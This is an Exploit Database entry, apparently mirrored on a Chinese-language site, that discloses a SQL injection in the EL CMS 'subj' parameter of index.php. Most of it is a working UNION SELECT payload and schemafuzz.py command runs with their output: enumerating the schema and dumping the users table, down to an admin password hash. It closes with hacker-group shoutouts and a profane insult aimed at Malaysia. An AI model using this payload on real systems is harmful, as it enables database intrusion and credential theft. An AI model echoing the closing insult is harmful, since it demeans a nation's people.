Entry Level Content Management System (EL CMS) – SQL Injection

• Exploit Database
• 99 阅读

• 作者： vir0e5
  日期： 2010-05-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12667/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137

  [+] Contact : vir0e5[at]hackermail[dot]com [+] Group : TECON (The Eye COnference) Indonesia [+] Site : http://tecon-crew.org ********************************************   [Software Information ] [+]SOftware: Entry Level Content Management System (EL CMS) [+]vendor: http://www.entrylevelcms.com/ [+]Vulnerability : SQL Injection ********************************************   [ Vulnerable File ] http://localhost/website/index.php?subj=4   [demo with schemafuzz.py] |--------------------------------------------------------------- | rsauron[at]gmail[dot]com v5.0 | 6/2008schemafuzz.py |-MySQL v5+ Information_schema Database Enumeration |-MySQL v4+ Data Extractor |-MySQL v4+ Table & Column Fuzzer | Usage: schemafuzz.py [options] |-h helpdarkc0de.com |------------------------------------------------------------   C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6" --findcol   |------------------------------------------------------------ | rsauron[at]gmail[dot]com v5.0 | 6/2008schemafuzz.py |-MySQL v5+ Information_schema Database Enumeration |-MySQL v4+ Data Extractor |-MySQL v4+ Table & Column Fuzzer | Usage: schemafuzz.py [options] |-h helpdarkc0de.com |------------------------------------------------------------   [+] URL:http://localhost/website/index.php?subj=6-- [+] Evasion Used: "+" "--" [+] 03:36:40 [-] Proxy Not Given [+] Attempting To find the number of columns... [+] Testing: 0,1,2,3, [+] Column Length is: 4 [+] Found null column at column #: 0 [+] SQLi URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3-- [+] darkc0de URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3 [-] Done!   C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --full   |------------------------------------------------------------ | rsauron[at]gmail[dot]com v5.0 | 6/2008schemafuzz.py |-MySQL v5+ Information_schema Database Enumeration |-MySQL v4+ Data Extractor |-MySQL v4+ Table & Column Fuzzer | Usage: schemafuzz.py [options] |-h helpdarkc0de.com |------------------------------------------------------------   [+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3-- [+] Evasion Used: "+" "--" [+] 05:33:34 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: vman User: root@localhost Version: 5.0.51a   [Database]: elcms_db [Table: Columns] [0]pages: id,subject_id,menu_name,position,visible,content [1]subjects: id,menu_name,position,visible [2]users: id,username,hashed_password   [-] [05:55:27] [-] Total URL Requests 17 [-] Done     C:\Python26\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --dump -D elcms_db -T users -C id,username,hashed_password   |------------------------------------------------------------ | rsauron[at]gmail[dot]com v5.0 | 6/2008schemafuzz.py |-MySQL v5+ Information_schema Database Enumeration |-MySQL v4+ Data Extractor |-MySQL v4+ Table & Column Fuzzer | Usage: schemafuzz.py [options] |-h helpdarkc0de.com |------------------------------------------------------------   [+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3-- [+] Evasion Used: "+" "--" [+] 05:35:14 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: vman User: root@localhost Version: 5.0.51a [+] Dumping data from database "vman" Table "users" [+] Column(s) [&apos;id&apos;, &apos;username&apos;, &apos;hashed_password&apos;] [+] Number of Rows: 1   [0] 9:admin:376cb350808d766e547eadc45b8f19f541d436c8:376cb350808d766e547eadc45b8f19f541d436c8:   [-] [05:35:15] [-] Total URL Requests 3 [-] Done           If you not understand about it [Option/help this tools] schemafuzz.py -h   ******************************************** -- Thank&apos;s to my GOD and Soldier Of Allah   -- Special Thanks #http://indonesian-cyber.org (as Member) #http://indonesianhacker.org(as Member) #http://devilzc0de.org (as Member) #http://tecon-crew.org(as Member) #http://u3dcrew.darkbb.com(as Member)   --No Special for me, i&apos;m newbie!! ^^--   kaMtiEz, r3m1ck, mywisdom, kiddies, dewancc, m0z4rtkl1k, bluescreen, xyberdesktop, n0rma4n_gokil, 12i4n, BZ AND YOU!!!     Notice : "boycott malaysian product " * Fuck to Malaysia <= the truly thief asia